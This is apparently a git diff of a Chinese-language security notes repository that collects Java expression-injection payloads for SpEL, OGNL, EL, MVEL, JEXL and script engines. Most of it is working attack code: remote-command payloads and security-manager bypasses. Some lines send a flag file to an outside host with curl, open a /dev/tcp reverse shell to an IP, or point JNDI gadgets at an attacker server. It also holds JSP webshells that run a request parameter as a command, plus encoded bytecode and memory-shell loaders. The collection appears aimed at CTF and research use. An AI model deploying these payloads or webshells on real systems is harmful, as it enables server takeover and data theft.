+#set(script_e=net.sf.ehcache.util.ClassLoaderUtil::createNewInstance("javax.script.ScriptEngineManager"))#set(script_j=script_e.getEngineByName("js"))#set(exp="new java.io.BufferedWriter(new java.io.FileWriter('C:\\Users\\ctf\\jfinal-blog\\jfinal-blog\\webapp\\upload\\image\\2.txt::$DATA'));out.write(java.net.URLDecoder.decode('1231321231'));out.close();")#(script_j.eval(exp)) + + + +#set(script_e=net.sf.ehcache.util.ClassLoaderUtil::createNewInstance("javax.script.ScriptEngineManager"))#set(script_j=script_e.getEngineByName("js"))#set(exp="java.lang.Runtime.getRuntime().exec('ping kmvqho.dnslog.cn')")#(script_j.eval(exp)) + +java.lang.Runtime.getRuntime().exec('ping kmvqho.dnslog.cn') + + +#((com.mysql.jdbc.Util::handleNewInstance(((java.net.URLClassLoader::getSystemClassLoader()).loadClass("javax.script.ScriptEngineManager").getDeclaredConstructor()),null,null)).getEngineByExtension("js").eval("java.lang.Runtime.getRuntime().exec('ping kmvqho.dnslog.cn')")) diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/jsp/test.jsp" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/jsp/test.jsp" new file mode 100644 index 0000000..9584723 --- /dev/null +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/jsp/test.jsp" @@ -0,0 +1,4 @@ +<% +out.println(22222); +%> +${Runtime.getRuntime().exec("calc")} diff --git a/jndi-gadgets.md b/jndi-gadgets.md deleted file mode 100644 index bad3ffb..0000000 --- a/jndi-gadgets.md +++ /dev/null @@ -1,33 +0,0 @@ -``` -{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["ldap://1.116.136.120:1600/TomcatBypass/TomcatEcho"],"Realms":[""],"a":"a"} - -{"object":["com.mchange.v2.c3p0.JndiRefForwardingDataSource",{"jndiName":"rmi://localhost:8088/Exploit", "loginTimeout":0}]} - -InputStream in = new FileInputStream("C3P0.ser"); -byte[] data = toByteArray(in); -in.close(); -String HexString = bytesToHexString(data, data.length); -String poc = "{\"object\":[\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\",{\"userOverridesAsString\":\"HexAsciiSerializedMap:"+ HexString + ";\"}]}"; -System.out.println(poc); - -public static byte[] toByteArray(InputStream in) throws IOException { - byte[] classBytes; - classBytes = new byte[in.available()]; - in.read(classBytes); - in.close(); - return classBytes; -} - -public static String bytesToHexString(byte[] bArray, int length) { - StringBuffer sb = new StringBuffer(length); - for(int i = 0; i < length; ++i) { - String sTemp = Integer.toHexString(255 & bArray[i]); - if (sTemp.length() < 2) { - sb.append(0); - } - - sb.append(sTemp.toUpperCase()); - } - return sb.toString(); -} -``` diff --git a/shell/EL/Readme.md b/shell/EL/Readme.md new file mode 100644 index 0000000..dfd1a79 --- /dev/null +++ b/shell/EL/Readme.md @@ -0,0 +1,49 @@ +# EL + +https://xz.aliyun.com/t/7692 + +## 回显 + +https://forum.butian.net/share/886 + +```jsp +${ +pageContext.setAttribute("inputStream", Runtime.getRuntime().exec("cmd /c dir").getInputStream()); +Thread.sleep(1000); +pageContext.setAttribute("inputStreamAvailable", pageContext.getAttribute("inputStream").available()); +pageContext.setAttribute("byteBufferClass", Class.forName("java.nio.ByteBuffer")); +pageContext.setAttribute("allocateMethod", pageContext.getAttribute("byteBufferClass").getMethod("allocate", Integer.TYPE)); +pageContext.setAttribute("heapByteBuffer", pageContext.getAttribute("allocateMethod").invoke(null, pageContext.getAttribute("inputStreamAvailable"))); +pageContext.getAttribute("inputStream").read(pageContext.getAttribute("heapByteBuffer").array(), 0, pageContext.getAttribute("inputStreamAvailable")); +pageContext.setAttribute("byteArrType", pageContext.getAttribute("heapByteBuffer").array().getClass()); +pageContext.setAttribute("stringClass", Class.forName("java.lang.String")); +pageContext.setAttribute("stringConstructor", pageContext.getAttribute("stringClass").getConstructor(pageContext.getAttribute("byteArrType"))); +pageContext.setAttribute("stringRes", pageContext.getAttribute("stringConstructor").newInstance(pageContext.getAttribute("heapByteBuffer").array())); +pageContext.getAttribute("stringRes") +} +``` + +```java +InputStream whoami = Runtime.getRuntime().exec("whoami").getInputStream(); +Thread.sleep(100); +int whoami1 = whoami.available(); +byte[] array = ByteBuffer.allocate(100).array(); +whoami.read(array, 0, whoami1); +System.out.println(new String(array)); +``` +## 加载字节码 + ++ [Java el 2.1 表达式注入payload(复现上古版本nexus rce)](https://mp.weixin.qq.com/s?__biz=MzIzOTE1ODczMg==&mid=2247485253&idx=1&sn=b1490922c8b4dfcfde6cfdf425ea8597&chksm=e92f13e6de589af00713b3584841d20c209bf361fe1a1c2fa53e7f37432d7728da008bafde35&scene=178&cur_album_id=1359948349721460737#rd) +``` +${''.class.forName('com.sun.org.apache.bcel.internal.util.ClassLoader').newInstance().loadClass('$$BCEL$$$l$8b$I$I$7c$m$n_$A$Deval$$class$A$8dT$5bO$TQ$Q$fe$O$ddv$cb$b2$U$u$d7$827$f0$c2B$vU$f1$da$o$m$V$US$c1$80$c14$3em$b7$87$ba$a4$ddm$b6$5b$c2$3f$f2Uc$d2$gI$7c$f4$c1$9f$e2$8fP$e7l$97$5eB$8d$b6$e9$cc93$df$99$f9f$e6$9c$fe$f8$f5$f5$h$80$3bx$a9$60$Y$8b2$e2$K$fa$84$5e$92$91P$b0$8c$a4$Q$b7$VB$dcU$Q$c4$8a$C$J$f7$84$b8$_$80$P$c2x$u$f4$p$Z$8fe$a4$YB$ab$a6e$bak$M$Bm$e1$90A$ca$d8$F$ce0$945$z$be$5b$x$e7$b9$f3F$cf$97$c8$S$cd$da$86$5e$3a$d4$jS$ec$7d$a3$e4$be7$ab$U$p$cbO$f4R$9a$f6$fc$94$h$M$b7$b4$ec$b1$7e$a2$tK$baUL$k$b8$8ei$V$d3$L$XM$94$d3$u$XD$e8$k$ae$c1$aa$b7$da$ac$99$a5$Cw$Yb$X$40$be$8b$b0$91$7c$ed$e8$88$3b$bc$b0$cfu$P$3c$d5$E$9bvr$b3$cb$p$u$96$a82$ca$ecp$o$ael$9d$g$bc$e2$9a$b6U$95$n$9ce$dd$b4$Y$s$b4w$3d$K$Q$dd$d1$9d$o$j$h$ed$e1$a6$60$Hv$cd1$f8$b6$v$3a$d3$_$3a$b2$yP$wF$Qe$98$fc$L$7d$ca$d6$9b$x$95$7c$ee$d8$b1$w5$97Nq$bd$dc$f4$c9XU$f1$Ek$w$a6$b0$$cC$c5Sl$8aD$Z$n$9e$a9$d8$c2$b6$8a$e7x$c1$c0$U$V$3b$d8$W$b3$nF$M$c3m$k$7b$f9cn$b8TN$x$cf$5e$ab$l$M$pm$e0$7e$cdr$cd2U$a5$U$b9$db$da$8ck$9d3$f5$cd$d4$87$f9$7fL$ff$b5c$h$bcZMw$a5$f0$8d4KJ$d1Q$_5$ee$3cMw$p$e8$f8$94$d6$d3$n$G5$dav$f9$93$X$d60$f9$LYo$fecZ$cf$L$Z$d2$x$Vn$d1$9dL$fc$d7$Vn_$c1$b0k7M$98$c5$Q$3dL$f1$J$80$89$d9$93$i$a5$dd$KiF$3a$b8$d8$A$fbD$8b$3e$8c$91$U$8f$91$8c$f4$3ee$8c$d3Jm$820$81I$d2T$qb$84$Q$B$3e$pD_$ms$86$be$5c$D$81Wg$90rg$I$e6$be$m$U$afC$ae$p$dc$40$7f$D$can$a2$8e$81$5cJ$fa$8e$e8RL$aaC$8d$O$92x$fb$e1$f7$cf$a5$3a$o$a9$60$y$f8$b1$95$7e$da$L$a9$m$8c$Bb$3e$888$oH$R$ff$Nb$$$e8$ac5S$fat$c4j$g3D$x$8c4$$$e12E$99$c5$i$ae$e0$wU$ab$91$e7$g$fd$q$3a$j$m$fb$M$951Gg$q$c2_G$3fn$e0$a6$df$8b$b8W$g$3a$fb$Q$f2$Mc$j$3d$a0$ff$R$cc$7bZ$f3P$L$7f$A$f1$e1$81$9c$fb$E$A$A').newInstance().exec('whoami')} +``` +**需要注意jdk版本问题可能没有bcel类** +理论上spel表达式可以用的payLoad 这里也可以利用 +## bypass + +https://forum.butian.net/share/1880 +```java +${""[param.a]()[param.b](param.c)[param.d]()[param.e](param.f)[param.g](param.h)} +``` + +https://blog.orange.tw/2018/08/how-i-chained-4-bugs-features-into-rce-on-amazon.html diff --git a/shell/Elasticsearch_MVEL/demo.java b/shell/Elasticsearch_MVEL/demo.java new file mode 100644 index 0000000..ecbcd44 --- /dev/null +++ b/shell/Elasticsearch_MVEL/demo.java @@ -0,0 +1,4 @@ +String exp = "a=123;new java.lang.ProcessBuilder("calc").start();"; +Map vars = new HashMap(); +vars.put("foobar", new Integer(100)); +String result = MVEL.eval(exp, vars).toString(); diff --git a/shell/Elasticsearch_MVEL/pom.xml b/shell/Elasticsearch_MVEL/pom.xml new file mode 100644 index 0000000..46370b1 --- /dev/null +++ b/shell/Elasticsearch_MVEL/pom.xml @@ -0,0 +1,5 @@ + + org.mvel + mvel2 + 2.2.8.Final + diff --git a/shell/Groovy/readme.md b/shell/Groovy/readme.md new file mode 100644 index 0000000..1f20d18 --- /dev/null +++ b/shell/Groovy/readme.md @@ -0,0 +1,3 @@ +Groovy 安全 + +https://xz.aliyun.com/t/10703 diff --git a/shell/Jexl/demo.java b/shell/Jexl/demo.java new file mode 100644 index 0000000..24c1f84 --- /dev/null +++ b/shell/Jexl/demo.java @@ -0,0 +1,4 @@ +JexlContext jc = new MapContext(); +Expression e = new JexlEngine().createExpression("''.class.forName('java.lang.Runtime').getRuntime().exec("calc")"); +Object result = e.evaluate(jc); +System.out.println(result); diff --git a/shell/Jexl/pom.xml b/shell/Jexl/pom.xml new file mode 100644 index 0000000..ce02883 --- /dev/null +++ b/shell/Jexl/pom.xml @@ -0,0 +1,5 @@ + + org.apache.commons + commons-jexl + 2.1.1 + diff --git a/shell/OGNL/Readme.md b/shell/OGNL/Readme.md new file mode 100644 index 0000000..9b83e7d --- /dev/null +++ b/shell/OGNL/Readme.md @@ -0,0 +1,49 @@ +# OGNL bypass +```java +${@jdk.jshell.JShell@create().eval('java.lang.Runtime.getRuntime().exec("")} + +new javax.script.ScriptEngineManager().getEngineByName("js").eval(此处的Payload可以进行unicode编码) + +new javax.script.ScriptEngineManager().getEngineByName("js").eval("new j\u0061va.lang.ProcessBuilder['(java.l\u0061ng.String[])'](['cmd.exe','/c','calc']).start()\u003B"); +可参考s2的exp +jdk9+ +@jdk.jshell.Jshell@create().eval('code'); + +${(#cls = #this.getClass().forName("java.lang.Runtime")).(#rt=#cls.getDeclaredMethod("getRuntime",null).invoke(null,null)).(#exec=#cls.getDeclaredMethod("exec", this.getClass().forName("[Ljava.lang.String;"))).(#exec.invoke(#rt,"calc".split(",")))} +``` +## bypass sm +参考 js的bypass +```java +String bypass_sm_exp = "var str = Java.type('java.lang.String[]').class;" + + "var map = Java.type('java.util.Map').class;" + + "var string = Java.type('java.lang.String').class;" + + "var Redirect = Java.type('java.lang.ProcessBuilder.Redirect[]').class;" + + "var boolean = Java.type('boolean').class;" + + "var c = java.lang.Class.forName('java.lang.ProcessImpl');" + + "var start = c.getDeclaredMethod('start',str,map,string,Redirect,boolean);" + + "start.setAccessible(true);" + + "var anArray = [\"cmd\", \"/c\", \"ipconfig\"];" + + "var cmd = Java.to(anArray, Java.type(\"java.lang.String[]\"));" + + "var input = start.invoke(null,cmd,null,null,null,false).getInputStream();" + + "var reader = new java.io.BufferedReader(new java.io.InputStreamReader(input));" + + "var stringBuilder = new java.lang.StringBuilder();" + + "var line = null;" + + "while((line = reader.readLine())!=null){" + + "stringBuilder.append(line);" + + "stringBuilder.append('\\r\\n');"+ + "}" + + "stringBuilder.toString();" + + "print(stringBuilder)"; + + new javax.script.ScriptEngineManager().getEngineByName("js").eval(bypass_sm_exp); +``` + +>参考 +>https://www.sec-in.com/article/753 +>https://www.mi1k7ea.com/2020/03/16/OGNL%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/ +## Bypass + +https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/ + +## mybatis 存在${}的ognl +参考2022的d3ctf ezsql diff --git a/shell/OGNL/demo.java b/shell/OGNL/demo.java new file mode 100644 index 0000000..2dd2d74 --- /dev/null +++ b/shell/OGNL/demo.java @@ -0,0 +1,3 @@ +OgnlContext context = new OgnlContext(); +Object execResult = Ognl.getValue("@java.lang.Runtime@getRuntime().exec('calc')", null); +System.out.println(execResult); diff --git a/shell/OGNL/pom.xml b/shell/OGNL/pom.xml new file mode 100644 index 0000000..2ca1036 --- /dev/null +++ b/shell/OGNL/pom.xml @@ -0,0 +1,5 @@ + +ognl +ognl +3.0.1 + diff --git a/shell/Readme.md b/shell/Readme.md new file mode 100644 index 0000000..9f01e86 --- /dev/null +++ b/shell/Readme.md @@ -0,0 +1,38 @@ +# shell + +偶然发现了一篇文章 +>https://xz.aliyun.com/t/7798 + + ++ [一种新型Java一句话木马的实现](https://xz.aliyun.com/t/9715) + +## 命令执行的tips + +https://www.anquanke.com/post/id/243329 + +https://xz.aliyun.com/t/7046 + +https://mp.weixin.qq.com/s?__biz=Mzg5MjQ1OTkwMg==&mid=2247483860&idx=1&sn=436dbdf49846851da5480e9e0c26ac23&chksm=c03c8fc5f74b06d3d6a8dba8726d4b82d811254073bbc75f982bd59f705c1e750178eddd3fe7&mpshare=1&scene=23&srcid=01302ApMKF6H7h71gWVIbJDN&sharer_sharetime=1643510224916&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd + +**其实说到底是java.lang.Runtime#exec(string)一个对命令进行了空格切分(导致切分不合本意),另一个string[]是自己去分离可以执行** + +下面代码是可以执行的 + +/cmd?command=;curl http://ip:port + +```java +@GetMapping(value = "/cmd") +public void cmd(@RequestParam String command) throws Exception { + String[] c = { "/bin/bash","-c", "hacker "+ command };///bin/bash -c hacker;ls + Process p = Runtime.getRuntime().exec(c); +} +``` + +下面是不能执行的 +```java +Command = "ping 127.0.0.1"+request.getParameter("cmd"); +Runtime.getRuntime().exec(command); +``` +## webshell 管理工具 + ++ [菜刀HTTP流量中转代理过WAF](https://xz.aliyun.com/t/2739) **现在来说就是bx和gsl了** diff --git a/shell/SPEL/Readme.md b/shell/SPEL/Readme.md new file mode 100644 index 0000000..e989f3e --- /dev/null +++ b/shell/SPEL/Readme.md @@ -0,0 +1,132 @@ +# SPEL + +>new关键字大小写可以绕过 + +## poc + +```java +#{…} 用于执行SpEl表达式,并将内容赋值给属性 +${…} 主要用于加载外部属性文件中的值 + +T(Thread).sleep(10000) + +T(java.lang.Runtime).getRuntime().exec("calc") +T(Runtime).getRuntime().exec("calc") + +// ProcessBuilder +new java.lang.ProcessBuilder({'calc'}).start() +new ProcessBuilder({'calc'}).start() +new java.lang.ProcessBuilder("cmd.exe","/c","calc").start() +${new java.lang.ProcessBuilder(new java.lang.String(new byte[]{99,97,108,99})).start()} + +''.getClass().forName('java.lang.Runtime').getRuntime().exec('calc.exe') +''.class.getSuperclass().class.forName('java.lang.Runtime').getRuntime().exec('calc.exe') +''.getClass 替换为 ''.class.getSuperclass().class + +//14&15 +''.class.getSuperclass().class.forName('java.lang.Runtime').getDeclaredMethods()[14].invoke(''.class.getSuperclass().class.forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),'calc') + +bypass sm +T (javax.script.ScriptEngineManager).newInstance().getEngineByName("nashorn").eval("java.lang.Runtime.getRuntime().exec('calc')") +T(javax.script.ScriptEngineManager).newInstance().getEngineByName("nashorn").eval("s=[3];s[0]='cmd';s[1]='/C';s[2]='calc';java.la"+"ng.Run"+"time.getRu"+"ntime().ex"+"ec(s);") + +T(org.springframework.util.StreamUtils).copy(T(javax.script.ScriptEngineManager).newInstance().getEngineByName("JavaScript").eval("xxx"),) + +T(org.springframework.util.StreamUtils).copy(T(javax.script.ScriptEngineManager).newInstance().getEngineByName("JavaScript").eval(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("ex"+"ec",T(String[])).invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("getRu"+"ntime").invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime")),new String[]{"cmd","/C","calc"})),) + +T(org.springframework.util.StreamUtils).copy(T(javax.script.ScriptEngineManager).newInstance().getEngineByName("JavaScript").eval(T(java.net.URLDecoder).decode("%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%63%61%6c%63%22%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29")),) + +T(SomeWhitelistedClassNotPartOfJDK).ClassLoader.loadClass("jdk.jshell.JShell",true).Methods[6].invoke(null,{}).eval('whatever java code in one statement').toString() + + +T(org.springframework.util.SerializationUtils).deserialize(T(com.sun.org.apache.xml.internal.security.utils.Base64).decode('rO0AB...')) +// 可以结合CC链食用 + +//内存木马 回显 +T(org.springframework.cglib.core.ReflectUtils).defineClass('Singleton',T(com.sun.org.apache.xml.internal.security.utils.Base64).decode('yv66vgAAADIAtQ....'),T(org.springframework.util.ClassUtils).getDefaultClassLoader()) + +#{T(org.springframework.cglib.core.ReflectUtils).defineClass('Memshell',T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAA....'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject()} + +${''.getClass().forName('java.script.ScriptEngineManager').newInstance().getEngineByName("nashorn").eval(#request.getHeader('User-Agent'))} + +echo + +JDK 7 及以上版本 +JAVA:java.nio.file.Files.readAllLines(java.nio.file.Paths.get("/flag"), java.nio.charset.Charset.defaultCharset()) + +T(java.nio.file.Files).readAllLines(T(java.nio.file.Paths).get('/flag'), T(java.nio.charset.Charset).defaultCharset()) + +commons-io组件 +T(org.apache.commons.io.IOUtils).toString(payload).getInputStream()) + +使用jdk>=9中的JShell,这种方式会受限于jdk的版本问题 +T(SomeWhitelistedClassNotPartOfJDK).ClassLoader.loadClass("jdk.jshell.JShell",true).Methods[6].invoke(null,{}).eval('').toString() + +new java.util.Scanner(new java.lang.ProcessBuilder("cmd", "/c", "dir", ".\\").start().getInputStream(), "GBK").useDelimiter("asfsfsdfsf").next() +原理在于Scanner#useDelimiter方法使用指定的字符串分割输出,所以这里给一个乱七八糟的字符串即可,就会让所有的字符都在第一行,然后执行next方法即可获得所有输出 + +new java.io.BufferedReader(new java.io.InputStreamReader(new ProcessBuilder("cmd", "/c", "whoami").start().getInputStream(), "gbk")).readLine() + +new String(T(java.nio.file.Files).readAllBytes(T(java.nio.file.Paths).get(T(java.net.URI).create("file:/C:/Users/helloworld/1.txt")))) + +T(java.nio.file.Files).write(T(java.nio.file.Paths).get(T(java.net.URI).create("file:/C:/Users/helloworld/1.txt")), '123464987984949'.getBytes(), T(java.nio.file.StandardOpenOption).WRITE) +``` + +## bypass + +```java +#{T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("ex"+"ec",T(String[])).invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("getRu"+"ntime").invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime")),new String[]{"/bin/bash","-c","curl fg5hme.ceye.io/`cat flag_j4v4_chun|base64|tr '\n' '-'`"})} + + +#{T(javax.script.ScriptEngineManager).newInstance().getEngineByName("nashorn").eval("s=[3];s[0]='/bin/bash';s[1]='-c';s[2]='ex"+"ec 5<>/dev/tcp/1.2.3.4/2333;cat <&5 | while read line; do $line 2>&5 >&5;done';java.la"+"ng.Run"+"time.getRu"+"ntime().ex"+"ec(s);")} + +Nuxeo RCE +''['class'].forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(''['class'].forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),'curl 172.17.0.1:9898') + + +jdk9+ + +T(jdk.jshell.JShell).Methods[6].invoke(null,'').eval('xxxx'); +``` + +字符串绕过 + +```python +message = input('Enter message to encode:') + +print('Decoded string (in ASCII):\n') + +print('T(java.lang.Character).toString(%s)' % ord(message[0]), end="") +for ch in message[1:]: + print('.concat(T(java.lang.Character).toString(%s))' % ord(ch), end=""), +print('\n') + +print('new java.lang.String(new byte[]{', end=""), +print(ord(message[0]), end="") +for ch in message[1:]: + print(',%s' % ord(ch), end=""), +print(')}') +``` + +防御方式是使用`SimpleEvaluationContext`来禁用其敏感的功能,从而阻止表达式注入执行问题的出现。 + + +其他bypass: https://xz.aliyun.com/t/9245 + +https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/ + +## springboot回显 +``` +Java.type("org.springframework.web.context.request.RequestContextHolder").currentRequestAttributes().getResponse().addHeader("test",new java.lang.String(Java.type("sun.misc.IOUtils").readFully(new java.io.FileInputStream("/flag"),1024,false))); +``` + +## 参考 +> https://xz.aliyun.com/t/9245 **可以使用#request.getRequestedSessionId() 或者 #request.getHeader('User-Agent') 反正可以使用request对象或者respose** +> +>https://www.cnblogs.com/bitterz/p/15206255.html +> +>https://landgrey.me/blog/15/ +> +>http://rui0.cn/archives/1043 +> +>http://rui0.cn/archives/1015 diff --git a/shell/ScriptEngineManager/Readme.md b/shell/ScriptEngineManager/Readme.md new file mode 100644 index 0000000..456d9f6 --- /dev/null +++ b/shell/ScriptEngineManager/Readme.md @@ -0,0 +1,164 @@ +# ScriptEngineManager + +Java 6/7采用的js解析引擎是Rhino + +java8开始换成了Nashorn。 + +## 调用Java方法 + +前面加上全限定类名即可 + +```js +var s = [3]; +s[0] = "cmd"; +s[1] = "/c"; +s[2] = "whoami"; +var p = java.lang.Runtime.getRuntime().exec(s); +var sc = new java.util.Scanner(p.getInputStream(),"GBK").useDelimiter("\\A");//输出 +var result = sc.hasNext() ? sc.next() : ""; +print(result) +sc.close(); +``` + +## 导入Java类型 + +```js +var str = java.lang.String; + + //这种写法仅仅支持Nashorn,Rhino并不支持。jdk8+ +var str = Java.type("java.lang.String");//类型 +-----------------------------------------数组-------------------------------- +// Rhino +var Array = java.lang.reflect.Array +var intClass = java.lang.Integer.TYPE +var array = Array.newInstance(intClass, 8) + +// Nashorn +var str = Java.type("java.lang.String[]"); +var IntArray = Java.type("int[]") +var array = new IntArray(8) +``` + +## 导入Java class + +>通过反射可以获得java类 + +```js +// Rhino +var str = java.lang.String.class; +var impl = java.lang.ProcessImpl.class; + +// Nashorn +var str = Java.type("java.lang.String").class;//类型 +var impl = Java.type("java.lang.ProcessImpl").class; +``` + +## 导入Java类 + +```js +load("nashorn:mozilla_compat.js"); + +importClass(java.util.HashSet); +var set = new HashSet(); + +importPackage(java.util); +var list = new ArrayList(); +``` + +在一些特殊情况下,导入的全局包会影响js中的函数,例如类名冲突。这个时候可以用JavaImporter,并配合with语句,对导入的Java包设定一个使用范围。 + +```js +// create JavaImporter with specific packages and classes to import + +var SwingGui = new JavaImporter(javax.swing, + javax.swing.event, + javax.swing.border, + java.awt.event); +with (SwingGui) { + // 在with里面才可以调用swing里面的类,防止污染 + var mybutton = new JButton("test"); + var myframe = new JFrame("test"); +} +``` + +## 方法调用 + +方法在JavaScript中实际上是对象的一个属性,所以除了使用 . 来调用方法之外,也可以使用[]来调用方法: + +```js +var System = Java.type('java.lang.System'); +System.out.println('Hello, World'); // Hello, World +System.out['println']('Hello, World'); // Hello, World +``` + +## 方法重载 + +Java支持重载(Overload)方法,例如,System.out 的 println 有多个重载版本,如果你想指定特定的重载版本,可以使用[]指定参数类型。例如: + +```js +var System = Java.type('java.lang.System'); +System.out['println'](3.14); // 3.14 +System.out['println(double)'](3.14); // 3.14 +System.out['println(int)'](3.14); // 3 +``` + +## 反射 + +```js +import javax.script.ScriptEngine; +import javax.script.ScriptEngineManager; + +public class main { + public static void main(String[] args) throws Exception { + String poc1 = "var s = [3];\n" + + "s[0] = \"cmd\";\n" + + "s[1] = \"/c\";\n" + + "s[2] = \"whoami\";" + + "var p = java.lang.Runtime.getRuntime().exec(s);\n" + + "var sc = new java.util.Scanner(p.getInputStream(),\"GBK\").useDelimiter(\"\\\\A\");\n" + + "var result = sc.hasNext() ? sc.next() : \"\";\n" + + "print(result);sc.close();"; + + String bypass_sm_exp = "var str = Java.type('java.lang.String[]').class;" + + "var map = Java.type('java.util.Map').class;" + + "var string = Java.type('java.lang.String').class;" + + "var Redirect = Java.type('java.lang.ProcessBuilder.Redirect[]').class;" + + "var boolean = Java.type('boolean').class;" + + "var c = java.lang.Class.forName('java.lang.ProcessImpl');" + + "var start = c.getDeclaredMethod('start',str,map,string,Redirect,boolean);" + + "start.setAccessible(true);" + + "var anArray = [\"cmd\", \"/c\", \"ipconfig\"];" + + "var cmd = Java.to(anArray, Java.type(\"java.lang.String[]\"));" + + "var input = start.invoke(null,cmd,null,null,null,false).getInputStream();" + + "var reader = new java.io.BufferedReader(new java.io.InputStreamReader(input));" + + "var stringBuilder = new java.lang.StringBuilder();" + + "var line = null;" + + "while((line = reader.readLine())!=null){" + + "stringBuilder.append(line);" + + "stringBuilder.append('\\r\\n');"+ + "}" + + "stringBuilder.toString();" + + "print(stringBuilder)"; + ScriptEngine engine = new ScriptEngineManager().getEngineByExtension("js"); + engine.eval(bypass_sm_exp); + } +} +``` +2021/12/21 更新 + +## 远程加载 + +之前在安全客上介绍了这个利用思路[文章](https://www.anquanke.com/post/id/248771#h3-3),当时没有利用成功,今天晚上jiang师傅给我说了利用思路。大概是一个load()去远程加载执行。 + +https://anuradha-15.medium.com/loading-scripts-using-nashorn-85585f495cf0 + +```java +String url = "http://127.0.0.1:8089/evil" ; +eval("load('"+url+"')"); +``` +evil +```java +var a=exp();function exp(){var x=new java.lang.ProcessBuilder; x.command("calc"); x.start();}; +``` + +扩展,那这样的话是不是可以减少我们的exp拉。在远程的调用我们的恶意代码可以bypass sm,然后通过load来加载。 diff --git a/shell/ScriptEngineManager/java-scripting-programmers-guide.pdf b/shell/ScriptEngineManager/java-scripting-programmers-guide.pdf new file mode 100644 index 0000000..8edc8f4 Binary files /dev/null and b/shell/ScriptEngineManager/java-scripting-programmers-guide.pdf differ diff --git a/shell/ScriptEngineManager/main.java b/shell/ScriptEngineManager/main.java new file mode 100644 index 0000000..283ccaa --- /dev/null +++ b/shell/ScriptEngineManager/main.java @@ -0,0 +1,39 @@ +import javax.script.ScriptEngine; +import javax.script.ScriptEngineManager; + +public class main { + public static void main(String[] args) throws Exception { + String poc1 = "var s = [3];\n" + + "s[0] = \"cmd\";\n" + + "s[1] = \"/c\";\n" + + "s[2] = \"whoami\";" + + "var p = java.lang.Runtime.getRuntime().exec(s);\n" + + "var sc = new java.util.Scanner(p.getInputStream(),\"GBK\").useDelimiter(\"\\\\A\");\n" + + "var result = sc.hasNext() ? sc.next() : \"\";\n" + + "print(result);sc.close();"; + + String bypass_sm_exp = "var str = Java.type('java.lang.String[]').class;" + + "var map = Java.type('java.util.Map').class;" + + "var string = Java.type('java.lang.String').class;" + + "var Redirect = Java.type('java.lang.ProcessBuilder.Redirect[]').class;" + + "var boolean = Java.type('boolean').class;" + + "var c = java.lang.Class.forName('java.lang.ProcessImpl');" + + "var start = c.getDeclaredMethod('start',str,map,string,Redirect,boolean);" + + "start.setAccessible(true);" + + "var anArray = [\"cmd\", \"/c\", \"ipconfig\"];" + + "var cmd = Java.to(anArray, Java.type(\"java.lang.String[]\"));" + + "var input = start.invoke(null,cmd,null,null,null,false).getInputStream();" + + "var reader = new java.io.BufferedReader(new java.io.InputStreamReader(input));" + + "var stringBuilder = new java.lang.StringBuilder();" + + "var line = null;" + + "while((line = reader.readLine())!=null){" + + "stringBuilder.append(line);" + + "stringBuilder.append('\\r\\n');"+ + "}" + + "stringBuilder.toString();" + + "print(stringBuilder)"; + ScriptEngine engine = new ScriptEngineManager().getEngineByExtension("js"); + engine.eval(bypass_sm_exp); + } + +} diff --git a/shell/ScriptEngineManager/shell.jsp b/shell/ScriptEngineManager/shell.jsp new file mode 100644 index 0000000..59fdf64 --- /dev/null +++ b/shell/ScriptEngineManager/shell.jsp @@ -0,0 +1,13 @@ +<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*,java.beans.*,java.lang.*,javax.script.*"%> +<% + ScriptEngineManager scriptEngineManager = new ScriptEngineManager(); + BufferedReader object = (BufferedReader)scriptEngineManager.getEngineByName("JavaScript").eval("new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("cmd.exe /c "+request.getParameter("cmd")+"").getInputStream()))"); + + String line = ""; + String result = ""; + while((line=object.readLine())!=null) + { + result = result + line; + } + out.println(result); +%> diff --git a/shell/ScriptEngineManager/shell2.jsp b/shell/ScriptEngineManager/shell2.jsp new file mode 100644 index 0000000..5b211fc --- /dev/null +++ b/shell/ScriptEngineManager/shell2.jsp @@ -0,0 +1,17 @@ +<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*,java.beans.*,java.lang.*,javax.script.*"%> +<% + ScriptEngineManager manager = new ScriptEngineManager(); + ScriptEngine engine = manager.getEngineByName("JavaScript"); + + Compilable compEngine = (Compilable) engine; + CompiledScript script = compEngine.compile("new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("cmd.exe /c dir").getInputStream()))"); + BufferedReader object = (BufferedReader)script.eval(); + + String line = ""; + String result = ""; + while((line=object.readLine())!=null) + { + result = result + line; + } + out.println(result); +%> diff --git a/shell/bypass/servertableentry.java b/shell/bypass/servertableentry.java new file mode 100644 index 0000000..5af874b --- /dev/null +++ b/shell/bypass/servertableentry.java @@ -0,0 +1,28 @@ +package shell.bypass; + +import com.sun.corba.se.impl.logging.ActivationSystemException; +import com.sun.corba.se.spi.activation.RepositoryPackage.ServerDef; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import 